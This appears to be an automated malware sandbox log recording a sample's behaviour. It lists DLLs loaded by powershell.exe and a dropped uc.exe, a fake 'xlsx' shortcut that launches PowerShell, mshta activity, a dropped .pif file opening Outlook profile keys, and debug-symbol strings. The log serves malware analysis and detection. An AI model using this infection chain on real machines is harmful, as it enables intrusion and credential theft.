Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: eamsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: windows.storage.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: FT. 40FE CNY .xlsx.lnk

LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: calc.pdbGCTL source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852558870.000001A2C46E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852439079.000001A2C46DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851615477.000001A2C4722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865516494.000001A2C46F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852507533.000001A2C4710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852261324.000001A2C46D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852234112.000001A2C438F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
Source:	Binary string: PSReadline.pdbaK source: powershell.exe, 00000011.00000002.1635136687.0000029E326E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E323A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source:	Binary string: _.pdb source: bwsiuvcU.pif, 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: calc.pdb source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
